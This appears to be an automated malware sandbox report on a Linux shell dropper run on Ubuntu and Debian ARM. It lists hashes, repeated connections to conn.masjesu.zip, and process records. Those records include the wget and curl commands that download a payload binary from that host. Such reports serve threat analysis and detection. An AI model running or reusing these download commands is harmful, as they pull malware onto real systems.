| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
Files
/tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-24 01:27
Reported
2024-11-24 01:29
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
148s
Max time network
129s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6.sh
[/tmp/dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| GB | 89.187.167.3:443 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-24 01:27
Reported
2024-11-24 01:30
Platform
debian9-armhf-20240611-en
Max time kernel
149s
Max time network
29s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6.sh
[/tmp/dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |